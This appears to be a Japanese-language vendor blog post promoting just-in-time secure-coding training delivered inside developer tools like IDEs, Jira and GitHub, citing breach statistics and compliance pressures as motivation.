しかし、ソフトウェア・セキュリティを管理するのは、すべて開発者の肩にかかっているわけではないことを忘れてはなりません。それは、やはりAppSecチームの領域です（セキュリティ意識の高い開発者と一緒に仕事をすれば、一般的なバグを繰り返し修正する代わりに、余裕を持って仕事をすることができます）。DevSecOpsプロセスが機能するためには、チームのすべてのメンバーがセキュリティに対する責任を共有するために必要なサポートとツールを持つことが必要であり、適切な種類のトレーニングが最も重要です。適切なツールとトレーニングのバランスをとるためには、開発者と密接に協力して彼らを刺激し、前向きな変化を促すことができるAppSecの専門家の洞察力が必要です。

破壊的なトレーニングは効果があるというよりも迷惑なもので、開発者が嫌がるものはうまくいきません。IDEや課題追跡システムと統合されたソリューションは、一口サイズの知識に焦点を当てた一つの選択肢であり、必要とされる瞬間に正しい情報を目の前に提供します。

ここでは、実際にその仕組みを紹介します。

Just-in-Time、「念のため」ではありません。

状況に応じた実践的な学習は、最も効果的なトレーニング方法です。これは "Just in Time"（JiT）トレーニングと呼ばれ、セキュアコーディングを学ぶ開発者にとって非常に有効な方法です。

トヨタのリーン生産方式を起源とするJiTのトレーニングは、必要に応じて、最も重要な時に、状況に応じて起動するように設計されています。開発者が不適切なパーミッションを持っているように見えるものを書いたとします。もし、小さなバックドアが開いていて、攻撃者がリモートでコードを実行できるようになっていたら？開発者が、Confluenceのドキュメントをさかのぼったり、トレーニングで触れたことをグーグルで検索したりするのではなく、必要なときに必要な知識にアクセスできれば、はるかに記憶に残ります。

ジャストインタイムは、「念のため」の学習に対するアンチテーゼです。後者は一般的な知識の伝達方法ですが、単に効率的ではありません。私たちは、開発者が安全なコーディングのベストプラクティスに簡単に取り組めるようにし、今取り組んでいる重要な目標に集中しながら、キャリアのためにスキルアップすることのメリットを理解してもらう必要があります。

開発者にトレーニングを追わせるのはやめてほしい。

開発者が教室に行ったり、コンテキストスイッチで5つのステップを踏んだりして、静的な理論ベースのトレーニングにアクセスするインセンティブは何でしょうか？

一般的には、情報漏えいの原因となる脆弱性が多ければ、ほとんどの組織が行っていることは、それほど効果的なものではない、ということになります。ベライゾンの2020年データ漏洩調査報告書によると、データ漏洩の43%はウェブの脆弱性に起因しているとされています。開発者は、高等教育でも、職場のスキルアップの一環でも、効果的なトレーニングを受けていません。もしそうであれば、SQLインジェクションや旧来のパス・トラバーサルといった一般的な脆弱性が悪用され、重大なデータが流出することはなく、サイバーセキュリティのスキル不足も解消されるはずです。

開発者がトレーニングを受けてセキュリティに慣れるための現状を知っていながら、その結果の悪さに驚くのはなぜでしょうか。JiraやGitHub、IDEなど、開発者が実際に作業する場所でトレーニングにアクセスできるようにすることは、開発者と組織の両方にとって、よりスムーズで統合された、違和感の少ないトレーニング体験を実現するために、プラスの効果があるかもしれません。業界は、セキュリティ意識を高めることがもはや贅沢なことではないという環境の中で、より簡単にセキュリティ意識を高められるように前進する必要があるのです。

開発ワークフローを確保する準備はできましたか？

セキュリティ意識の高い開発者は、そのスキルと、コード構築の段階から組織に提供できる保護によって尊敬されている。特にGDPRの罰金、PCI-DSSコンプライアンス規制、NISTガバナンス...そしてEquifaxのような数百万ドル規模の集団訴訟で訴えられる可能性など、セキュリティはもはやオプションではない。

統合されたアプローチは、破壊的ではない学習方法で開発者を魅了し、より詳細なcourses 、セキュリティチャンピオンを育成し、世界のデータを安全かつ健全に保つために必要な共通の責任感を喚起するためのきっかけとなるかもしれません。

JiraとGitHub用の統合ツールを今すぐダウンロードして、ご意見をお聞かせください。